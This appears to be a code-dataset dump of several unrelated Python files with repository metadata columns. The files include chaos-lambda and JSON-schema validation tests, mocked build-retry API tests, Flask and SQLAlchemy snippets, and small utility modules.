self._setUp(class_name, subfolder)
config = "{ \"delay\": 0, \"is_enabled\": true, \"error_code\": 404, \"exception_msg\": \"This is chaos\", \"rate\": 0.000001, \"fault_type\": \"latency\"}"
self._create_params(name='test.config', value=config)
@ignore_warnings
def test_delay_zero(self):
method_name = sys._getframe().f_code.co_name
self._setTestUp(method_name)
with self._caplog.at_level(logging.DEBUG, logger="chaos_lambda"):
response = handler('foo', 'bar')
assert (
'sleeping now' not in self._caplog.text
)
self.assertEqual(
str(response), "{'statusCode': 200, 'body': 'Hello from Lambda!'}")
class TestDelayEnabledDelayNotInt(TestBase):
@pytest.fixture(autouse=True)
def inject_fixtures(self, caplog):
self._caplog = caplog
@ignore_warnings
def _setTestUp(self, subfolder):
class_name = self.__class__.__name__
self._setUp(class_name, subfolder)
config = "{ \"delay\": \"boo\", \"is_enabled\": true, \"error_code\": 404, \"exception_msg\": \"This is chaos\", \"rate\": 0.000001, \"fault_type\": \"latency\"}"
self._create_params(name='test.config', value=config)
@ignore_warnings
def test_delay_not_int(self):
method_name = sys._getframe().f_code.co_name
self._setTestUp(method_name)
with self._caplog.at_level(logging.DEBUG, logger="chaos_lambda"):
response = handler('foo', 'bar')
assert (
'sleeping now' not in self._caplog.text
)
assert (
'Parameter delay is no valid int' in self._caplog.text
)
self.assertEqual(
str(response), "{'statusCode': 200, 'body': 'Hello from Lambda!'}")
if __name__ == '__main__':
unittest.main()
| 34.962025 | 170 | 0.613505 | 619 | 5,524 | 5.171244 | 0.153473 | 0.071853 | 0.053108 | 0.034989 | 0.870665 | 0.861918 | 0.861918 | 0.850359 | 0.850359 | 0.850359 | 0 | 0.017137 | 0.25 | 5,524 | 157 | 171 | 35.184713 | 0.755491 | 0 | 0 | 0.679688 | 0 | 0 | 0.145004 | 0 | 0 | 0 | 0 | 0 | 0.101563 | 1 | 0.125 | false | 0 | 0.046875 | 0.007813 | 0.21875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6b1c34899520bddf6698b7e6ad21f752536d0d87 | 4,803 | py | Python | tests/loading/definition/schema/test_min_and_max_properties.py | maroux/flex | dfd7c6d79d065d7ce1b0c799e51e9bb5292612b2 | [
"MIT"
] | 160 | 2015-01-15T05:36:44.000Z | 2021-08-04T00:43:54.000Z | tests/loading/definition/schema/test_min_and_max_properties.py | maroux/flex | dfd7c6d79d065d7ce1b0c799e51e9bb5292612b2 | [
"MIT"
] | 151 | 2015-01-20T16:45:36.000Z | 2022-02-23T21:07:58.000Z | tests/loading/definition/schema/test_min_and_max_properties.py | maroux/flex | dfd7c6d79d065d7ce1b0c799e51e9bb5292612b2 | [
"MIT"
] | 90 | 2015-01-20T11:19:36.000Z | 2021-08-03T08:58:18.000Z | import pytest
from flex.constants import (
OBJECT,
STRING,
INTEGER,
)
from flex.error_messages import MESSAGES
from flex.exceptions import ValidationError
from flex.loading.definitions.schema import schema_validator
from tests.utils import (
assert_path_not_in_errors,
assert_message_in_errors,
)
def test_min_and_max_properties_are_not_required():
try:
schema_validator({})
except ValidationError as err:
errors = err.detail
else:
errors = {}
assert_path_not_in_errors('minProperties', errors)
assert_path_not_in_errors('maxProperties', errors)
@pytest.mark.parametrize(
'value',
('abc', [1, 2], None, {'a': 1}, True, False, 1.1),
)
def test_min_properties_for_invalid_types(value):
"""
Ensure that the value of `minProperties` is validated to be numeric.
"""
with pytest.raises(ValidationError) as err:
schema_validator({'minProperties': value})
assert_message_in_errors(
MESSAGES['type']['invalid'],
err.value.detail,
'minProperties.type',
)
@pytest.mark.parametrize(
'type_',
(
STRING,
(STRING, INTEGER),
),
)
def test_type_validation_for_min_properties_for_invalid_types(type_):
with pytest.raises(ValidationError) as err:
schema_validator({
'minProperties': 5,
'type': type_,
})
assert_message_in_errors(
MESSAGES['type']['invalid_type_for_min_properties'],
err.value.detail,
'type',
)
@pytest.mark.parametrize(
'type_',
(
OBJECT,
(STRING, OBJECT, INTEGER),
),
)
def test_type_validation_for_min_properties_for_valid_types(type_):
try:
schema_validator({
'minProperties': 5,
'type': type_,
})
except ValidationError as err:
errors = err.detail
else:
errors = {}
assert_path_not_in_errors('type', errors)
@pytest.mark.parametrize(
'value',
('abc', [1, 2], None, {'a': 1}, True, False, 1.1),
)
def test_max_properties_for_invalid_types(value):
"""
Ensure that the value of `maxProperties` is validated to be numeric.
"""
with pytest.raises(ValidationError) as err:
schema_validator({'maxProperties': value})
assert_message_in_errors(
MESSAGES['type']['invalid'],
err.value.detail,
'maxProperties.type',
)
@pytest.mark.parametrize(
'type_',
(
STRING,
(STRING, INTEGER),
),
)
def test_type_validation_for_max_properties_for_invalid_types(type_):
with pytest.raises(ValidationError) as err:
schema_validator({
'maxProperties': 5,
'type': type_,
})
assert_message_in_errors(
MESSAGES['type']['invalid_type_for_max_properties'],
err.value.detail,
'type',
)
@pytest.mark.parametrize(
'type_',
(
OBJECT,
(STRING, OBJECT, INTEGER),
),
)
def test_type_validation_for_max_properties_for_valid_types(type_):
try:
schema_validator({
'maxProperties': 5,
'type': type_,
})
except ValidationError as err:
errors = err.detail
else:
errors = {}
assert_path_not_in_errors('type', errors)
def test_min_properties_must_be_greater_than_0():
"""
Ensure that the value of `maxProperties` is validated to be numeric.
"""
with pytest.raises(ValidationError) as err:
schema_validator({'minProperties': -1})
assert_message_in_errors(
MESSAGES['minimum']['invalid'],
err.value.detail,
'minProperties.minimum',
)
def test_max_properties_must_be_greater_than_0():
"""
Ensure that the value of `maxProperties` is validated to be numeric.
"""
with pytest.raises(ValidationError) as err:
schema_validator({'maxProperties': -1})
assert_message_in_errors(
MESSAGES['minimum']['invalid'],
err.value.detail,
'maxProperties.minimum',
)
def test_min_and_max_properties_with_valid_values():
try:
schema_validator({
'minProperties': 4,
'maxProperties': 8,
})
except ValidationError as err:
errors = err.detail
else:
errors = {}
assert_path_not_in_errors('minProperties', errors)
assert_path_not_in_errors('maxProperties', errors)
def test_max_properties_must_be_greater_than_or_equal_to_min_properties():
with pytest.raises(ValidationError) as err:
schema_validator({
'minProperties': 5,
'maxProperties': 4,
})
assert_message_in_errors(
MESSAGES['max_properties']['must_be_greater_than_min_properties'],
err.value.detail,
'maxProperties',
)
| 23.429268 | 74 | 0.634812 | 525 | 4,803 | 5.48 | 0.148571 | 0.04171 | 0.076469 | 0.058394 | 0.859576 | 0.811609 | 0.77407 | 0.77407 | 0.735488 | 0.717762 | 0 | 0.006154 | 0.255674 | 4,803 | 204 | 75 | 23.544118 | 0.798601 | 0.057256 | 0 | 0.649682 | 0 | 0 | 0.120439 | 0.031117 | 0 | 0 | 0 | 0 | 0.095541 | 1 | 0.070064 | false | 0 | 0.038217 | 0 | 0.10828 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6b39c39456f7cc0317670f9afbae116f6c98cd85 | 80 | py | Python | app/main/__init__.py | jakhax/esp9266_rfid_lock | e9c25628a023c8d6005a136e240ca1a36589fd36 | [
"MIT"
] | 2 | 2020-11-10T09:16:21.000Z | 2021-12-15T07:27:17.000Z | app/main/__init__.py | jakhax/consecutive_normal_punches | e9c25628a023c8d6005a136e240ca1a36589fd36 | [
"MIT"
] | null | null | null | app/main/__init__.py | jakhax/consecutive_normal_punches | e9c25628a023c8d6005a136e240ca1a36589fd36 | [
"MIT"
] | null | null | null | from flask import Blueprint
main=Blueprint("main",__name__)
from . import views | 20 | 31 | 0.8 | 11 | 80 | 5.454545 | 0.636364 | 0.433333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1125 | 80 | 4 | 32 | 20 | 0.84507 | 0 | 0 | 0 | 0 | 0 | 0.049383 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
865365ff6807936a1cfc53592eb7bd9714770c0c | 87 | py | Python | twelve/unsupervised/__init__.py | DSE512/twelve | 89ced1db394e5689c617edb4c819aec4138c48c3 | [
"BSD-3-Clause"
] | 3 | 2021-02-09T15:31:53.000Z | 2021-10-31T15:46:51.000Z | twelve/unsupervised/__init__.py | yngtodd/twelve | 89ced1db394e5689c617edb4c819aec4138c48c3 | [
"BSD-3-Clause"
] | null | null | null | twelve/unsupervised/__init__.py | yngtodd/twelve | 89ced1db394e5689c617edb4c819aec4138c48c3 | [
"BSD-3-Clause"
] | 1 | 2021-12-16T15:33:50.000Z | 2021-12-16T15:33:50.000Z | from .kmeans import Kmeans, kmeans_save
from .parallel_kmeans import KmeansDistributed
| 29 | 46 | 0.862069 | 11 | 87 | 6.636364 | 0.545455 | 0.328767 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103448 | 87 | 2 | 47 | 43.5 | 0.935897 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
866118ea8c8a639f4d41f9fa1c66cc8f77cf8e29 | 27 | py | Python | test_python_import_issue/pacx/j.py | zengmeng1094/test-python | 79aa30789c2bb8700f660a4d6b13f06960e169e5 | [
"MIT"
] | null | null | null | test_python_import_issue/pacx/j.py | zengmeng1094/test-python | 79aa30789c2bb8700f660a4d6b13f06960e169e5 | [
"MIT"
] | null | null | null | test_python_import_issue/pacx/j.py | zengmeng1094/test-python | 79aa30789c2bb8700f660a4d6b13f06960e169e5 | [
"MIT"
] | null | null | null | def add():
print('add') | 13.5 | 16 | 0.518519 | 4 | 27 | 3.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 27 | 2 | 16 | 13.5 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0.107143 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
8676f34479e7f82fa07f938c4cb293147fc7bc93 | 15,831 | py | Python | tests/changes/api/test_diff_build_retry.py | vault-the/changes | 37e23c3141b75e4785cf398d015e3dbca41bdd56 | [
"Apache-2.0"
] | 443 | 2015-01-03T16:28:39.000Z | 2021-04-26T16:39:46.000Z | tests/changes/api/test_diff_build_retry.py | vault-the/changes | 37e23c3141b75e4785cf398d015e3dbca41bdd56 | [
"Apache-2.0"
] | 12 | 2015-07-30T19:07:16.000Z | 2016-11-07T23:11:21.000Z | tests/changes/api/test_diff_build_retry.py | vault-the/changes | 37e23c3141b75e4785cf398d015e3dbca41bdd56 | [
"Apache-2.0"
] | 47 | 2015-01-09T10:04:00.000Z | 2020-11-18T17:58:19.000Z | import mock
import yaml
from datetime import datetime
from changes.config import db
from changes.constants import Cause, Result, SelectiveTestingPolicy, Status
from changes.models.build import Build
from changes.models.job import Job
from changes.models.project import ProjectOption
from changes.testutils import APITestCase, SAMPLE_DIFF, SAMPLE_DIFF_BYTES
from changes.vcs.base import CommandError, InvalidDiffError, RevisionResult, UnknownRevision, Vcs
class DiffBuildRetryTest(APITestCase):
def get_fake_vcs(self, log_results=None):
def _log_results(parent=None, branch=None, offset=0, limit=1):
assert not branch
return iter([
RevisionResult(
id='a' * 40,
message='hello world',
author='Foo <foo@example.com>',
author_date=datetime.utcnow(),
)])
if log_results is None:
log_results = _log_results
# Fake having a VCS and stub the returned commit log
fake_vcs = mock.Mock(spec=Vcs)
fake_vcs.read_file.side_effect = CommandError(
cmd="test command", retcode=128)
fake_vcs.exists.return_value = True
fake_vcs.log.side_effect = UnknownRevision(
cmd="test command", retcode=128)
fake_vcs.export.side_effect = UnknownRevision(
cmd="test command", retcode=128)
fake_vcs.get_patch_hash.return_value = 'a' * 40
def fake_update():
# this simulates the effect of calling update() on a repo,
# mainly that `export` and `log` now works.
fake_vcs.log.side_effect = log_results
fake_vcs.export.side_effect = None
fake_vcs.export.return_value = SAMPLE_DIFF_BYTES
fake_vcs.update.side_effect = fake_update
return fake_vcs
def setUp(self):
super(DiffBuildRetryTest, self).setUp()
diff_id = 123
self.project = self.create_project()
self.patch = self.create_patch(
repository_id=self.project.repository_id,
diff=SAMPLE_DIFF
)
self.source = self.create_source(
self.project,
patch=self.patch,
)
self.diff = self.create_diff(diff_id, source=self.source)
self.create_plan(self.project)
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_simple(self, get_vcs):
get_vcs.return_value = self.get_fake_vcs()
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.failed,
selective_testing_policy=SelectiveTestingPolicy.enabled,
)
job = self.create_job(build=build)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 1
new_build = Build.query.get(data[0]['id'])
assert new_build.id != build.id
assert new_build.collection_id != build.collection_id
assert new_build.project_id == self.project.id
assert new_build.cause == Cause.retry
assert new_build.author_id == build.author_id
assert new_build.source_id == build.source_id
assert new_build.label == build.label
assert new_build.message == build.message
assert new_build.target == build.target
assert new_build.selective_testing_policy == build.selective_testing_policy
(new_job,) = list(Job.query.filter(
Job.build_id == new_build.id,
))
assert new_job.id != job.id
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_simple_multiple_diffs(self, get_vcs):
get_vcs.return_value = self.get_fake_vcs()
self.create_diff(124, source=self.source)
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.failed
)
job = self.create_job(build=build)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 1
new_build = Build.query.get(data[0]['id'])
assert new_build.id != build.id
assert new_build.collection_id != build.collection_id
assert new_build.project_id == build.project_id
assert new_build.source_id == build.source_id
(new_job,) = list(Job.query.filter(
Job.build_id == new_build.id,
))
assert new_job.id != job.id
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_simple_passed(self, get_vcs):
get_vcs.return_value = self.get_fake_vcs()
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.passed
)
self.create_job(build=build)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 0
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_simple_in_progress(self, get_vcs):
get_vcs.return_value = self.get_fake_vcs()
build = self.create_build(
project=self.project,
source=self.source,
status=Status.in_progress,
result=Result.failed
)
self.create_job(build=build)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 0
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_multiple_builds_same_project(self, get_vcs):
get_vcs.return_value = self.get_fake_vcs()
self.create_build(
project=self.project,
source=self.source
)
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.failed
)
job = self.create_job(build=build)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 1
new_build = Build.query.get(data[0]['id'])
assert new_build.id != build.id
assert new_build.collection_id != build.collection_id
assert new_build.project_id == self.project.id
assert new_build.source_id == build.source_id
(new_job,) = list(Job.query.filter(
Job.build_id == new_build.id,
))
assert new_job.id != job.id
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_multiple_builds_different_projects(self, get_vcs):
get_vcs.return_value = self.get_fake_vcs()
self.create_build(
project=self.project,
source=self.source
)
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.failed
)
job = self.create_job(build=build)
project2 = self.create_project(
repository=self.project.repository,
name="project 2"
)
build2 = self.create_build(
project=project2,
source=self.source,
status=Status.finished,
result=Result.passed
)
self.create_job(build=build2)
self.create_plan(project2)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 1
new_build = Build.query.get(data[0]['id'])
assert new_build.id != build.id
assert new_build.collection_id != build.collection_id
assert new_build.project_id == self.project.id
assert new_build.source_id == build.source_id
(new_job,) = list(Job.query.filter(
Job.build_id == new_build.id,
))
assert new_job.id != job.id
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_multiple_builds_different_projects_all_failed(self, get_vcs):
get_vcs.return_value = self.get_fake_vcs()
self.create_build(
project=self.project,
source=self.source
)
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.failed
)
job = self.create_job(build=build)
project2 = self.create_project(
repository=self.project.repository,
name="project 2"
)
build2 = self.create_build(
project=project2,
source=self.source,
status=Status.finished,
result=Result.failed
)
job2 = self.create_job(build=build2)
self.create_plan(project2)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 2
data = [Build.query.get(x['id']) for x in data]
(new_build,) = [x for x in data if x.project_id == build.project_id]
assert new_build.id != build.id
assert new_build.collection_id != build.collection_id
assert new_build.source_id == build.source_id
jobs = list(Job.query.filter(
Job.build_id == new_build.id,
))
new_job = jobs[0]
assert new_job.id != job.id
(new_build2,) = [x for x in data if x.project_id == build2.project_id]
assert new_build2.id != build2.id
assert new_build2.collection_id != build2.collection_id
assert new_build2.source_id == build2.source_id
(new_job,) = list(Job.query.filter(
Job.build_id == new_build2.id,
))
assert new_job.id != job2.id
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_when_in_whitelist(self, get_vcs):
get_vcs.return_value = self.get_fake_vcs()
po = ProjectOption(
project=self.project,
name='build.file-whitelist',
value='ci/*',
)
db.session.add(po)
db.session.commit()
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.failed
)
job = self.create_job(build=build)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 1
new_build = Build.query.get(data[0]['id'])
assert new_build.id != build.id
assert new_build.collection_id != build.collection_id
assert new_build.project_id == build.project_id
assert new_build.source_id == build.source_id
(new_job,) = list(Job.query.filter(
Job.build_id == new_build.id,
))
assert new_job.id != job.id
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_when_not_in_whitelist(self, get_vcs):
get_vcs.return_value = self.get_fake_vcs()
po = ProjectOption(
project=self.project,
name='build.file-whitelist',
value='nonexisting_directory',
)
db.session.add(po)
db.session.commit()
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.failed
)
self.create_job(build=build)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 0
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_when_in_blacklist(self, get_vcs):
fake_vcs = self.get_fake_vcs()
fake_vcs.read_file.side_effect = None
fake_vcs.read_file.return_value = yaml.safe_dump({
'build.file-blacklist': ['ci/*'],
})
get_vcs.return_value = fake_vcs
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.failed
)
self.create_job(build=build)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 0
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_when_not_all_in_blacklist(self, get_vcs):
fake_vcs = self.get_fake_vcs()
fake_vcs.read_file.side_effect = None
fake_vcs.read_file.return_value = yaml.safe_dump({
'build.file-blacklist': ['ci/not-real'],
})
get_vcs.return_value = fake_vcs
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.failed
)
job = self.create_job(build=build)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 200
data = self.unserialize(resp)
assert len(data) == 1
new_build = Build.query.get(data[0]['id'])
assert new_build.id != build.id
assert new_build.collection_id != build.collection_id
assert new_build.project_id == build.project_id
assert new_build.source_id == build.source_id
(new_job,) = list(Job.query.filter(
Job.build_id == new_build.id,
))
assert new_job.id != job.id
@mock.patch('changes.models.repository.Repository.get_vcs')
def test_invalid_diff(self, get_vcs):
fake_vcs = self.get_fake_vcs()
fake_vcs.read_file.side_effect = None
fake_vcs.read_file.return_value = yaml.safe_dump({
'build.file-blacklist': ['ci/not-real'],
})
get_vcs.return_value = fake_vcs
build = self.create_build(
project=self.project,
source=self.source,
status=Status.finished,
result=Result.failed
)
self.create_job(build=build)
path = '/api/0/phabricator_diffs/{0}/retry/'.format(self.diff.diff_id)
with mock.patch('changes.api.diff_build_retry.files_changed_should_trigger_project') as mocked:
mocked.side_effect = InvalidDiffError
resp = self.client.post(path, follow_redirects=True)
assert resp.status_code == 400
| 32.844398 | 103 | 0.61588 | 1,962 | 15,831 | 4.759429 | 0.087156 | 0.040266 | 0.045941 | 0.049689 | 0.799636 | 0.790426 | 0.788392 | 0.782073 | 0.780788 | 0.769008 | 0 | 0.010677 | 0.278252 | 15,831 | 481 | 104 | 32.912682 | 0.806581 | 0.009412 | 0 | 0.70557 | 0 | 0 | 0.08075 | 0.065952 | 0 | 0 | 0 | 0 | 0.180371 | 1 | 0.04244 | false | 0.007958 | 0.026525 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
86abd0855dc3211ac3d645f9d6bd243a890c7ba9 | 844 | py | Python | Tashkeela_IST/app/models.py | mahsayedsalem/Tashkeela_IST | ac9960071e08a984d7dc6da477a147ab784bd3d8 | [
"MIT"
] | 1 | 2019-09-04T16:02:23.000Z | 2019-09-04T16:02:23.000Z | Tashkeela_IST/app/models.py | mahsayedsalem/Tashkeela_IST | ac9960071e08a984d7dc6da477a147ab784bd3d8 | [
"MIT"
] | null | null | null | Tashkeela_IST/app/models.py | mahsayedsalem/Tashkeela_IST | ac9960071e08a984d7dc6da477a147ab784bd3d8 | [
"MIT"
] | null | null | null | from app import db
class User(db.Model):
id = db.Column(db.Integer, primary_key = True)
name = db.Column(db.String(255))
email = db.Column(db.String(255), unique=True)
def __init__(self, name, email):
self.name = name
self.email = email
def __repr__(self):
return '<User %r>' % self.name
class Attendant(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(255))
email = db.Column(db.String(255), unique=True)
img_1 = db.Column(db.String(255))
img_2 = db.Column(db.String(255))
img_3 = db.Column(db.String(255))
img_4 = db.Column(db.String(255))
img_5 = db.Column(db.String(255))
def __init__(self, name, email):
self.name = name
self.email = email
def __repr__(self):
return '<User %r>' % self.name
| 27.225806 | 50 | 0.618483 | 129 | 844 | 3.868217 | 0.24031 | 0.176353 | 0.220441 | 0.288577 | 0.907816 | 0.869739 | 0.693387 | 0.693387 | 0.693387 | 0.693387 | 0 | 0.049307 | 0.231043 | 844 | 30 | 51 | 28.133333 | 0.719569 | 0 | 0 | 0.666667 | 0 | 0 | 0.021327 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.041667 | 0.083333 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
86c7eab9a1398cdb9409c57fea1434045864ca38 | 151 | py | Python | satyrus/sat/types/symbols/__init__.py | lucasvg/Satyrus3-FinalProject-EspTopsOTM | 024785752abdc46e3463d8c94df7c3da873c354d | [
"MIT"
] | null | null | null | satyrus/sat/types/symbols/__init__.py | lucasvg/Satyrus3-FinalProject-EspTopsOTM | 024785752abdc46e3463d8c94df7c3da873c354d | [
"MIT"
] | null | null | null | satyrus/sat/types/symbols/__init__.py | lucasvg/Satyrus3-FinalProject-EspTopsOTM | 024785752abdc46e3463d8c94df7c3da873c354d | [
"MIT"
] | null | null | null | from .main import SYS_CONFIG, DEF_CONSTANT, DEF_ARRAY, DEF_CONSTRAINT, CONS_INT, CONS_OPT
from .main import PREC, DIR, LOAD, OUT, EPSILON, ALPHA, EXIT | 75.5 | 90 | 0.788079 | 25 | 151 | 4.52 | 0.76 | 0.141593 | 0.247788 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125828 | 151 | 2 | 91 | 75.5 | 0.856061 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
86d5583a7e3c678b81291c4fe151342d11161d67 | 153 | py | Python | plugins/raid/render/diff.py | dwieland/carnibot | 83d660cac151739b524c6f11e8e7fe0b068869d7 | [
"Apache-2.0"
] | 1 | 2018-08-02T06:27:37.000Z | 2018-08-02T06:27:37.000Z | plugins/raid/render/diff.py | dwieland/carnibot | 83d660cac151739b524c6f11e8e7fe0b068869d7 | [
"Apache-2.0"
] | 4 | 2018-08-02T06:35:07.000Z | 2018-08-02T06:37:14.000Z | plugins/raid/render/diff.py | dwieland/carnibot | 83d660cac151739b524c6f11e8e7fe0b068869d7 | [
"Apache-2.0"
] | null | null | null | class Diff:
def __init__(self, wrapped):
self.wrapped = wrapped
def __str__(self):
return "```diff\n{}```".format(self.wrapped)
| 21.857143 | 52 | 0.594771 | 18 | 153 | 4.611111 | 0.555556 | 0.39759 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.24183 | 153 | 6 | 53 | 25.5 | 0.715517 | 0 | 0 | 0 | 0 | 0 | 0.091503 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
86e47f34384c693d9b7709cd89a59571199f5091 | 25 | py | Python | hackerrank/test.py | rayguang/ratesbuddy | ec97f85201812967bb3380bba6de41bdb223eab6 | [
"MIT"
] | null | null | null | hackerrank/test.py | rayguang/ratesbuddy | ec97f85201812967bb3380bba6de41bdb223eab6 | [
"MIT"
] | null | null | null | hackerrank/test.py | rayguang/ratesbuddy | ec97f85201812967bb3380bba6de41bdb223eab6 | [
"MIT"
] | null | null | null |
l=[1,2,3]
print(len(l)) | 6.25 | 13 | 0.52 | 7 | 25 | 1.857143 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.136364 | 0.12 | 25 | 4 | 13 | 6.25 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
